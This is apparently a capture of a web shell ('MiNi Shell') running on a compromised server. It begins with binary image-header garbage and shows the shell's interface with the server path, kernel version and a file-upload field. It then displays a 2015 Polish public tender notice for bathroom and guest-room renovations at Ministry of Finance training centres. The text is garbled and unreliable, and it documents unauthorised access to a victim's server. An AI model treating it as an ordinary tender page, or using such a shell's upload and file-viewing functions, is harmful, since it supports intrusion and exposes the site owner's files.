JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150707/168610-N-2015.html

<p class="kh_header"><b>Warszawa: Wykonanie remontu łazienek ogólnodostępnych 
oraz pokoi noclegowych wraz z łazienkami
w Ośrodkach Zamiejscowych 
Centrum Edukacji Zawodowej Resortu Finansów 
w Otwocku i Jastrzębiej Górze</b><br>
<b>Numer ogłoszenia: 168610 - 2015; data zamieszczenia: 07.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Edukacji Zawodowej Resortu Finansów , ul. Okrzei 2/4, 03-710 Warszawa, woj. mazowieckie, tel. 22 670 11 82, faks 22 619 51 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cezrf.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa podległa Ministrowi Finansów.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu łazienek ogólnodostępnych 
oraz pokoi noclegowych wraz z łazienkami
w Ośrodkach Zamiejscowych 
Centrum Edukacji Zawodowej Resortu Finansów 
w Otwocku i Jastrzębiej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie remontu łazienek ogólnodostępnych oraz pokoi noclegowych wraz z łazienkami w Ośrodkach Zamiejscowych Centrum Edukacji Zawodowej Resortu Finansów w Otwocku i Jastrzębiej Górze, tj.:
a)	część I-w budynku Ośrodka Zamiejscowego w Otwocku -3 łazienki ogólnodostępne oraz jeden pokój noclegowy z łazienką;
b)	część II -w budynku Ośrodka Zamiejscowego w Jastrzębiej Górze -  9 pokoi noclegowych z łazienkami.
2.	Zakres robót obejmuje w szczególności: 
2.1. w budynku OZ w Otwocku
a)	demontaż paneli w pokoju;
b)	dostawę i ułożenie wykładziny przemysłowej gęstej z atestem ppoż.;
c)	przycięcie istniejącego parapetu;
d)	wykonanie gładzi i prac malarskich z gruntowaniem w pokoju w kolorze uzgodnionym z Zarządzającym realizacją umowy,
e)	skucie istniejącej glazury i terakoty w łazience wraz z warstwami; 
f)	wykucie ościeżnic, rozbiórka ścianek działowych; 
g)	wymianę pionów i podejść wodno-kanalizacyjnych;
h)	wymianę instalacji elektrycznej wraz gniazdami i włącznikami oraz dostosowanie instalacji do podłączenia pieca sauny i suszarek;
i)	wykonanie instalacji ogrzewania podłogowego;
j)	prace tynkarskie (oszprycowanie, tynkowanie);
k)	przygotowanie ścian pod licowanie, w tym wykonanie izolacji przeciwwodnej z folii w płynie, uszczelnienie narożników oraz gruntowanie;
l)	dostawę i montaż ościeżnic oraz drzwi przesuwnych, AL i ścian sanitarnych typu Wedi;
m)	wykonanie posadzek z płytek typu: terakota i bosa stopa;
n)	licowanie ścian płytkami ceramicznymi i dekorami;
o)	montaż  listew ozdobnych w narożnych połączeniach ścian z sufitem;
p)	wykonanie półki z płytek; 
q)	dostawę i montaż luster, białego wyposażenia łazienek, armatury łazienkowej;
r)	dostawę  i montaż grzejnika wraz z zaworami;
s)	dostawę i montaż lamp i kinkietów;
t)	dostawę i montaż półki pod umywalkę;
u)	wykonanie gładzi i prac malarskich w łazience z gruntowaniem na stropie;
v)	wykonanie sufitów podwieszanych;
w)	dostawę i montaż innych elementów, jak wentylator z wyłącznikiem czasowym, drzwiczki rewizyjne, 
x)	sprawdzenie szczelności wykonanej instalacji wodno-kanalizacyjnej i wykonanie pomiarów wykonanej instalacji elektrycznej;
y)	wywóz i utylizację odpadów.
2.2. w budynku OZ w Jastrzębiej Górze
a)	zabezpieczenie folią czujek SSWiN i ppoż.;
b)	rozebranie parkietu, listew, demontaż kabin i brodzików;
c)	skucie istniejącej glazury i terakoty wraz z warstwami; 
d)	wykucie ościeżnic, rozbiórka ścianek K-G; 
e)	wymurowanie ścian z bloczków;
f)	wykonanie ścian z K-G i okładzin z płyt K-G;
g)	wymianę pionów i podejść wodno-kanalizacyjnych;
h)	wymianę instalacji elektrycznej wraz gniazdami i włącznikami oraz dostosowanie instalacji do podłączenia lamp sufitowych;
i)	ułożenie w bruzdach istniejących instalacji: ppoż., internetowej, telefonicznej, TV);
j)	prace tynkarskie (oszprycowanie, tynkowanie);
k)	przygotowanie ścian i posadzek pod wykładzinę przemysłową ppoż. i licowanie płyt-kami, w tym wykonanie izolacji przeciwwodnej z folii w płynie, uszczelnienie narożników oraz gruntowanie;
l)	dostawę i ułożenie wykładziny ppoż. i listew;
m)	dostawę i montaż ościeżnic oraz drzwi łazienkowych oraz drzwi wejściowych do pokoju EI 30 z przystosowaniem do montażu zamków elektronicznych;
n)	wykonanie posadzek z płytek typu: terakota;
o)	licowanie ścian płytkami ceramicznymi i dekorami;
p)	montaż listew ozdobnych w narożnych połączeniach ścian z sufitem;
q)	wykonanie półek z płytek; 
r)	dostawę i wmontowanie luster;
s)	dostawę i montaż białego wyposażenia łazienek;
t)	dostawę i montaż armatury łazienkowej;
u)	dostawę i montaż grzejników wraz z zaworami;
v)	dostawę i montaż lamp i kinkietów;
w)	wykonanie gładzi i prac malarskich z gruntowaniem na ścianach i stropach; 
x)	dostawę i montaż innych elementów, jak wentylator z wyłącznikiem czasowym, kratki wentylacyjne, drzwiczki rewizyjne;
y)	sprawdzenie szczelności wykonanej instalacji wodno-kanalizacyjnej i wykonanie pomiarów wykonanej instalacji elektrycznej;
z)	wywóz i utylizację odpadów;.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający zastrzega możliwość udzielenia dotychczasowemu Wykonawcy, w okresie 3 lat od udzielenia zamówienia podstawowego, zamówienia uzupełniającego, stanowiącego nie więcej niż 50% wartości zamówienia podstawowego, polegającego na powtórzeniu tego samego rodzaju zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu i składający ofertę jest obowiązany wnieść wadium w wysokości:
a)	dla części I - 2 000 złotych (słownie: dwa tysiące złotych),
b)	dla części II - 5 000 złotych (słownie: pięć tysięcy złotych).
2.	Wadium może być wnoszone w jednej lub kilku następujących formach: 
1)	w pieniądzu, 
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy musi być poręczeniem pieniężnym,
3)	gwarancjach bankowych, 
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
3.	Wniesione wadium musi obejmować okres związania ofertą i nie może zawierać żadnych ograniczeń sprzecznych z ustawą Prawo zamówień publicznych, w szczególności ogranicza-jących możliwość zrealizowania praw określonych w art. 46 ust. 4a i 5 Ustawy. 
4.	Wadium wniesione w pieniądzu musi być przelane na rachunek bankowy Centrum Edukacji Zawodowej Resortu Finansów. 
Narodowy Bank Polski
nr rachunku: 91 1010 1010 0122 5013 9120 0000
z pożądanym podaniem tytułu przelewu:
Wadium - znak sprawy: CEZRF - ZP.261.1.21.2015</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zgodnie z przepisem § 1 ust. 4 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. poz. 231) zostanie uznany za spełniony, gdy Wykonawca wskaże w wykazie oraz złoży poświadczenia na wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenie działalności jest krótszy - w tym okresie co najmniej dwóch robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o wartości łącznej minimum:
dla części I zamówienia 200 000 zł (słownie: dwieście tysięcy złotych);
dla części II zamówienia 500 000 zł (słownie: pięćset tysięcy złotych);
Jeżeli wykonawca będzie składać ofertę na dwie części zamówienia,  zobowiązany jest dla każdej  części wykazać dwie inne roboty budowlane o minimalnych wartościach określonych dla danej części zamówienia. Wykonawca może wykazać dwie te same roboty dla dwóch części zamówienia, jeżeli wartość tych robót będzie równa sumie minimalnych wartości określonych dla dwóch części zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy Wykonawca wykaże się dysponowaniem dla każdej części zamówienia co najmniej jedną osobą posiadającą uprawnienia pozwalające na kierowanie robotami budowlanymi.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca jest zobowiązany wskazać w wykazie oraz złożyć poświadczenia  na wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenie działalności jest krótszy - w tym okresie co najmniej dwóch robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o wartości łącznej minimum:
dla części I zamówienia 200 000 zł (słownie: dwieście tysięcy złotych);
dla części II zamówienia 500 000 zł (słownie: pięćset tysięcy złotych);;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument zawierający dowód, że Wykonawca będzie dysponował zasobami innych podmiotów niezbędnymi do realizacji zamówienia, jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 Ustawy, polega na zasobach innych podmiotów na za-sadach określonych w art. 26 ust. 2b Ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Okres gwarancji - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje następujące możliwości dokonania istotnych zmian postanowień zawartej umowy:
1)	zmiany wartości umowy w przypadku zwiększenia bądź zmniejszenia stawek podatku od towarów i usług, dotyczących przedmiotu zamówienia w wyniku zmiany ustawy z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2004 r., Nr 54, poz. 535 z późn. zm.)
2)	zmiana terminu realizacji Umowy wynikająca z działania siły wyższej, o której mowa 
w § 14 wzoru umowy,
3)	zmiana terminu wykonania przedmiotu umowy w przypadku leżącej po stronie Zamawiającego zwłoki związanej z wprowadzeniem Wykonawcy na budowę, przedłużenie terminu obejmować będzie wyłącznie okres zwłoki,
4)	zmiana terminu wykonania przedmiotu umowy w przypadku konieczności wykonania robót dodatkowych w trybie art. 67 ust. 1 pkt 5 ustawy Prawo zamówień publicznych;
przedłużenie terminu obejmować będzie wyłącznie czas niezbędny do udzielenia 
zamówienia na roboty dodatkowe oraz czas niezbędny do wykonania tych robót,
2.	Wprowadzenie zmian postanowień umowy wymaga:
1)	zgodnej woli stron,
2)	zachowania formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cezrf.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Edukacji Zawodowej Resortu Finansów, 03-710 Warszawa, ul. Okrzei 2/4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2015 godzina 10:00, miejsce: Centrum Edukacji Zawodowej Resortu Finansów, 03-710 Warszawa, ul. Okrzei 2/4, sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie remontu łazienek ogólnodostępnych i pokoju noclegowego z łazienką w Ośrodku Zamiejscowym Centrum Edukacji Zawodowej Resortu Finansów w Otwocku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie remontu trzech łazienek ogólnodostępnych oraz jednego pokoju noclegowego wraz z łazienką ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Okres gwarancji - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie remontu pokoi noclegowych wraz z łazienkami w Ośrodku Zamiejscowym Centrum Edukacji Zawodowej Resortu Finansów w Jastrzębiej Górze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie remontu 9 pokoi noclegowych wraz z łazienkami ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Okres gwarancji - 4</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com